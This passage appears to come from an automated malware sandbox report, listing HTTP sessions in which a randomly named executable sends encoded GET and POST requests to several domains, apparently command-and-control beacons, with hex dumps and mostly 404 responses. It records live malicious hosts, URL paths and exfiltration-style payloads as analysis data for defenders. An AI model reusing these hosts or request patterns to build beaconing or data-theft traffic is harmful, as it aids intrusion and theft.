FFSkBb/VD3WPgo [TRUNCATED]
                                                        Sep 26, 2024 15:20:43.486179113 CEST549INHTTP/1.1 400
                                                        Server: ZGS
                                                        Date: Thu, 26 Sep 2024 13:20:43 GMT
                                                        Content-Type: text/html;charset=ISO-8859-1
                                                        Content-Length: 80
                                                        Connection: close
                                                        Set-Cookie: zalb_8ae64e9492=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/
                                                        Set-Cookie: csrfc=e0c412ba-d4e2-4f6b-b31b-f8b3ac5ac12c;path=/;priority=high
                                                        Set-Cookie: _zcsr_tmp=e0c412ba-d4e2-4f6b-b31b-f8b3ac5ac12c;path=/;SameSite=Strict;priority=high
                                                        Set-Cookie: JSESSIONID=B5BBA39C1088E93406973CB5CDC931B8; Path=/; HttpOnly
                                                        Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 34 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 22 31 22 2c 22 64 65 76 65 6c 6f 70 65 72 5f 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 69 6e 70 75 74 2e 22 7d 0a 0a
                                                        Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.449763136.143.186.12803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:20:45.317769051 CEST517OUTGET /ivo1/?IH=BP3PrJvHc6MXcF&wrRLLPUh=fL7FGqwZgFyeKETJ58v2LpmodVM6vZtD0XO9xnYIy5nXxzuHXVLl0+u5SqQtPDeu0FT/+Cn/ojl8jT3mUhnhpKNreTIBn1GsPPCO7XuNhO+zSMbYdoB0rmQ= HTTP/1.1
                                                        Host: www.lanxuanz.tech
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Sep 26, 2024 15:20:45.913655043 CEST1236INHTTP/1.1 404
                                                        Server: ZGS
                                                        Date: Thu, 26 Sep 2024 13:20:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 4641
                                                        Connection: close
                                                        Set-Cookie: zalb_8ae64e9492=0f71d2b25c73f2883ce01c2fd3c97eb8; Path=/
                                                        Set-Cookie: csrfc=fee37532-4fb9-4072-8345-973a3141cf20;path=/;priority=high
                                                        Set-Cookie: _zcsr_tmp=fee37532-4fb9-4072-8345-973a3141cf20;path=/;SameSite=Strict;priority=high
                                                        Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                        vary: accept-encoding
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50
                                                        Sep 26, 2024 15:20:45.913688898 CEST1236INData Raw: 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a
                                                        Data Ascii: %, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:452px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin
                                                        Sep 26, 2024 15:20:45.913702011 CEST448INData Raw: 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 3b 0a 20 20 20 20
                                                        Data Ascii: h3{ font-size:18px; font-family: "Open Sans"; font-weight:normal; font-weight:600; } .weight400{ font-weight:400; } .domain-color{
                                                        Sep 26, 2024 15:20:45.913712025 CEST1236INData Raw: 74 79 6c 65 3a 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 2d 69 6e 66 6f 20 6c 69 3a 62 65 66 6f 72 65 7b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 37 43 44 35 33 3b
                                                        Data Ascii: tyle:none; } .main-info li:before{ color: #37CD53; content: "\2713"; display: block; font-size: 18px; left: -30px; max-height: 0;
                                                        Sep 26, 2024 15:20:45.913731098 CEST1011INData Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 41 72 65 61 22 3e 0a 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: </div> <div class="content"> <div class="textArea"> <h3> <span class="weight400">Welcome</span> <span class="domain-color">www.lanxuanz.tech</span> </h3>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.449764199.192.21.169803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:20:51.383663893 CEST771OUTPOST /85su/ HTTP/1.1
                                                        Host: www.selftip.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.selftip.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 205
                                                        Referer: http://www.selftip.top/85su/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 7a 31 70 61 63 58 76 33 7a 71 55 44 6a 4c 39 45 77 69 6c 58 6f 52 6b 48 46 61 4a 2b 56 76 73 6b 31 79 70 46 5a 55 4d 44 64 50 39 50 4f 6c 38 76 77 4c 41 4b 67 73 36 6c 53 51 6c 6c 63 68 6d 2b 2f 41 70 4b 50 42 63 41 73 79 70 2b 70 66 4c 55 6b 74 6d 77 45 76 6a 78 47 6c 47 6c 59 39 31 4b 2f 62 48 55 70 59 6c 6a 46 6d 75 75 6b 31 43 53 72 74 30 66 33 37 71 39 6d 57 77 74 57 6f 68 54 7a 47 6b 68 4b 54 61 33 74 54 4c 71 58 62 61 33 2f 7a 4e 4a 48 73 77 32 57 42 52 55 6a 39 6d 7a 6a 35 72 44 64 71 7a 44 52 34 50 38 66 79 57 43 6b 2f 6f 62 32 4f 4b 35 58 4f 44 35 77 5a 55 38 6f 77 3d 3d
                                                        Data Ascii: wrRLLPUh=z1pacXv3zqUDjL9EwilXoRkHFaJ+Vvsk1ypFZUMDdP9POl8vwLAKgs6lSQllchm+/ApKPBcAsyp+pfLUktmwEvjxGlGlY91K/bHUpYljFmuuk1CSrt0f37q9mWwtWohTzGkhKTa3tTLqXba3/zNJHsw2WBRUj9mzj5rDdqzDR4P8fyWCk/ob2OK5XOD5wZU8ow==
                                                        Sep 26, 2024 15:20:52.008403063 CEST980INHTTP/1.1 404 Not Found
                                                        Date: Thu, 26 Sep 2024 13:20:51 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 774
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.449765199.192.21.169803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:20:54.007343054 CEST791OUTPOST /85su/ HTTP/1.1
                                                        Host: www.selftip.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.selftip.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 225
                                                        Referer: http://www.selftip.top/85su/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 7a 31 70 61 63 58 76 33 7a 71 55 44 69 71 4e 45 32 7a 6c 58 6b 68 6b 45 4c 36 4a 2b 65 50 73 67 31 79 6c 46 5a 56 35 49 64 39 70 50 50 45 4d 76 69 36 41 4b 7a 63 36 6c 59 77 6c 67 44 78 6e 79 2f 41 56 43 50 42 51 41 73 7a 4e 2b 70 64 44 55 6c 65 65 78 43 76 6a 7a 4f 46 47 72 46 4e 31 4b 2f 62 48 55 70 59 78 4a 46 6e 47 75 6a 46 79 53 72 4a 6f 41 37 62 72 50 6a 6d 77 74 53 6f 67 61 7a 47 6b 50 4b 57 37 71 74 51 6a 71 58 65 6d 33 2f 69 4e 49 49 73 77 38 49 78 51 47 74 63 53 32 71 4c 75 41 55 4e 62 45 50 34 66 75 65 30 48 59 31 4f 4a 4d 6b 4f 75 4b 4b 4a 4b 4e 39 61 70 31 7a 39 32 48 37 55 73 61 55 6a 58 4f 7a 74 30 32 66 6e 69 54 42 6f 49 3d
                                                        Data Ascii: wrRLLPUh=z1pacXv3zqUDiqNE2zlXkhkEL6J+ePsg1ylFZV5Id9pPPEMvi6AKzc6lYwlgDxny/AVCPBQAszN+pdDUleexCvjzOFGrFN1K/bHUpYxJFnGujFySrJoA7brPjmwtSogazGkPKW7qtQjqXem3/iNIIsw8IxQGtcS2qLuAUNbEP4fue0HY1OJMkOuKKJKN9ap1z92H7UsaUjXOzt02fniTBoI=
                                                        Sep 26, 2024 15:20:54.611762047 CEST980INHTTP/1.1 404 Not Found
                                                        Date: Thu, 26 Sep 2024 13:20:54 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 774
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.449766199.192.21.169803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:20:56.555665970 CEST10873OUTPOST /85su/ HTTP/1.1
                                                        Host: www.selftip.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.selftip.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 10305
                                                        Referer: http://www.selftip.top/85su/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 7a 31 70 61 63 58 76 33 7a 71 55 44 69 71 4e 45 32 7a 6c 58 6b 68 6b 45 4c 36 4a 2b 65 50 73 67 31 79 6c 46 5a 56 35 49 64 39 78 50 50 33 45 76 7a 70 59 4b 77 63 36 6c 47 67 6c 68 44 78 6e 37 2f 41 4e 47 50 42 4d 50 73 78 46 2b 6d 65 62 55 69 76 65 78 52 50 6a 7a 4d 46 47 71 59 39 31 6c 2f 62 33 59 70 59 68 4a 46 6e 47 75 6a 48 71 53 37 4e 30 41 35 62 71 39 6d 57 77 68 57 6f 68 7a 7a 47 39 79 4b 57 2b 64 74 68 44 71 58 2b 57 33 39 51 6c 49 42 73 77 79 4a 78 52 44 74 63 50 6d 71 4c 79 71 55 49 6e 69 50 36 44 75 64 41 75 45 67 4f 38 62 6e 75 2b 31 4a 6f 6e 72 7a 5a 46 72 33 4e 54 35 39 30 41 5a 4c 51 6a 42 35 66 77 37 44 33 53 4e 64 38 58 46 6a 6e 61 5a 77 61 76 4b 36 70 52 4c 48 45 52 69 6e 39 4b 31 57 74 70 79 4c 6c 39 63 4d 4b 76 77 2b 65 6c 53 47 62 2b 4c 52 74 4a 67 4f 52 54 51 64 65 51 4d 50 58 37 4c 79 42 33 54 30 51 66 65 6b 33 76 67 46 54 4e 6f 68 33 7a 36 58 53 56 49 75 53 62 66 4d 44 2b 51 34 76 44 61 79 52 6b 65 49 6a 43 6e 53 49 45 38 34 58 6a 79 32 68 32 6d 59 [TRUNCATED]
                                                        Data Ascii: wrRLLPUh=z1pacXv3zqUDiqNE2zlXkhkEL6J+ePsg1ylFZV5Id9xPP3EvzpYKwc6lGglhDxn7/ANGPBMPsxF+mebUivexRPjzMFGqY91l/b3YpYhJFnGujHqS7N0A5bq9mWwhWohzzG9yKW+dthDqX+W39QlIBswyJxRDtcPmqLyqUIniP6DudAuEgO8bnu+1JonrzZFr3NT590AZLQjB5fw7D3SNd8XFjnaZwavK6pRLHERin9K1WtpyLl9cMKvw+elSGb+LRtJgORTQdeQMPX7LyB3T0Qfek3vgFTNoh3z6XSVIuSbfMD+Q4vDayRkeIjCnSIE84Xjy2h2mYJfP+wjg3qz+itTmmLs87u83PSwROFL/X1CQ/z2+cogCM4EuY/NYWkPEuGHYlPCxnRDNCMYAQRb49cI16lbjj1aun+cKmggMC0zN+WSAQvXKIqKzGKEoJvWNLyceHcxnQHO148A6h3u444gVZw1075CdyxNFfz+4hJSOwDd/gKt4yf/ANfqmIdVbmamf3iC6iRUNK+Tm6V+/T7Ec8nWGHHNNlJZEw8LByU5DYgM7OswVIJH8V6X+D8gSC4VrGnMKT0Kvl18muOlZp7uUkLiGNh7C4FcUHwXNmaD83GQa3XJ7jnFNuXgRQ6EahbrFPN/qhlZvOqiTXQaH2YdSE6fYEC7Fe7Eb53vPLvoZagXNTsf+H5kguh5771cb/n/DsekqL/K8Y2gQRuhqP6zyy0k0dwijAy0ZRI4u6ziQGT6APwOL0KCEhT5CrPSj0OFr+i0eAaRXTn0oBXgQBnTuX7OeAQ6pYTeU7UME3xTsgtBpnNBEUVoTUxffu5VzibKhhcN5Zwf0HkBz4Lw+GBHn22nI1gIbRugGJGLLMeCNW4XznxOablhPoOy2AXJx50ECQOi5lshIaSjBlt0RYVgSqsPAfKSZ3J6tm2VrqSeKSvYGmxdWxitT3GVEdEZiJSb48EI9HQ8nlIySNZ+cG3U281Nwt6aq0DaxAh3nNXB [TRUNCATED]
                                                        Sep 26, 2024 15:20:57.237291098 CEST980INHTTP/1.1 404 Not Found
                                                        Date: Thu, 26 Sep 2024 13:20:57 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 774
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.449767199.192.21.169803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:20:59.102011919 CEST515OUTGET /85su/?wrRLLPUh=+3B6fjGs9Z40sbhWxh4Olw8ODpxTfKIF4isjbFYKdetJPWg+iKgIwujGEU5yKjzj4BkeFS8xvi4EjdbOtsLgFdPJH1ajNMdDlKenjZRhD3fwrVi0trMy8bo=&IH=BP3PrJvHc6MXcF HTTP/1.1
                                                        Host: www.selftip.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Sep 26, 2024 15:20:59.675018072 CEST995INHTTP/1.1 404 Not Found
                                                        Date: Thu, 26 Sep 2024 13:20:59 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 774
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.44976844.213.25.70803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:04.734848022 CEST789OUTPOST /72tr/ HTTP/1.1
                                                        Host: www.newdaydawning.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.newdaydawning.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 205
                                                        Referer: http://www.newdaydawning.net/72tr/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
